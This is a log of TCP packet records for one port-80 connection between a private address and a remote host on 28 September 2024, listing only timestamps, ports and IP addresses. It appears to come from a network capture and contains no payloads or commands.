Sep 28, 2024 17:52:13.642098904 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642122030 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642142057 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642164946 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642165899 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642179966 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642184973 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642201900 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642209053 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642218113 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642229080 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642235041 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642250061 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642251968 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642267942 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642270088 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642286062 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642312050 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642544031 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642591000 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642641068 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642657995 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642673969 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642687082 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642688990 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642705917 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642709970 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642723083 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642729044 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642752886 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642765999 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642834902 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642851114 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.642884016 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642898083 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.642992020 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.643007040 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.643023014 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.643038034 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.643045902 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.643058062 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.643060923 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.643074036 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.643076897 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.643093109 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.643095970 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.643119097 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.643129110 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.643142939 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.643168926 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.643282890 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.643299103 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.643331051 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.643342972 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.645495892 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.645510912 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.645528078 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.645545959 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.645551920 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.645574093 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.645579100 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.645593882 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.645595074 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.645612001 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.645627975 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.645634890 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.645639896 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.645651102 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.645661116 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.645668030 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.645682096 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.645684004 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.645697117 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.645699978 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.645716906 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.645719051 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.645730019 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.645740032 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.645777941 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.645777941 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646275997 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646291971 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646308899 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646322966 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646327019 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646343946 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646352053 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646358013 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646369934 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646387100 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646393061 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646403074 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646414042 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646421909 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646429062 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646439075 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646447897 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646456003 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646470070 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646480083 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646486044 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646506071 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646518946 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646738052 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646754026 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646769047 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646780968 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646784067 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646795988 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646800995 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646816969 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646832943 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646847963 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646908045 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646922112 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646939039 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646949053 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646954060 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646964073 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646971941 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646985054 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.646987915 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.646998882 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.647003889 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.647020102 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.647021055 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.647042036 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.647049904 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.647073984 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.654934883 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.654951096 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.654967070 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.654992104 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.655009031 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.655030966 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.655046940 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.655061960 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.655072927 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.655077934 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.655088902 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.655095100 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.655111074 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.655131102 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.655159950 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.699635029 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.699681044 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.699697018 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.699711084 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.699727058 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.699740887 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.699743032 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.699759007 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.699764967 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.699793100 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.699804068 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.700023890 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.700040102 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.700056076 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.700067997 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.700079918 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.700083971 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.700095892 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.700098038 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.700119972 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.700134993 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.700134993 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.700135946 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.700160027 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.700179100 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.738713980 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.738729954 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.738748074 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.738761902 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.738778114 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.738794088 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.738811016 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.738811016 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.738854885 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.738867998 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.738883018 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.738898039 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.738909960 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.738914013 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.738933086 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.738939047 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.738950014 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.738965988 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.738981009 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.738991976 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.738991976 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.738996983 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739017010 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739027977 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739043951 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739048004 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739059925 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739074945 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739077091 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739099026 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739104033 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739115953 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739130020 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739131927 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739151001 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739161015 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739166975 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739181995 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739190102 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739198923 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739209890 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739213943 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739238977 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739238977 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739258051 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739264011 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739274979 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739289999 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739303112 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739303112 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739305019 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739321947 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739326000 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739340067 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739355087 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739392042 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739521980 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739556074 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739567041 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739571095 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739587069 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739602089 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739603043 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739614010 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739617109 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739634037 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739634991 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739649057 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739650011 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739664078 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739667892 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739681005 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739682913 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739695072 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739700079 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739712000 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739715099 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739722967 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739732027 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739742994 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739748001 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739756107 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739763975 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739778042 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739778996 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739793062 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739797115 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739808083 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739811897 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739823103 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739828110 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.739839077 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739859104 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.739875078 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740087986 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740103006 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740117073 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740132093 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740139961 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740149021 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740159035 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740164042 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740180016 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740184069 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740195990 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740196943 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740212917 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740225077 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740228891 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740241051 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740246058 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740255117 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740262985 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740274906 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740278959 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740286112 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740295887 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740305901 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740313053 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740320921 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740328074 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740340948 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740345001 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740355968 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740360975 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740370035 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740377903 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740386963 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740402937 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740417957 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740627050 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740642071 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740675926 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740689039 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740714073 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740730047 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740744114 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740758896 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740758896 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740771055 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740776062 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740792036 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740792036 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740803003 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740812063 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.740822077 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740839958 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.740848064 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.770303965 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.770318985 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.770335913 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.770371914 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.770385981 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.770378113 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.770396948 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.770402908 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.770421028 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.770431995 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.770437002 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.770447016 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.770478964 CEST	49730	80	192.168.2.4	84.201.150.223
Sep 28, 2024 17:52:13.770869017 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.770895958 CEST	80	49730	84.201.150.223	192.168.2.4
Sep 28, 2024 17:52:13.770912886 CEST	80	49730	84.201.150.223	192.168.2.4
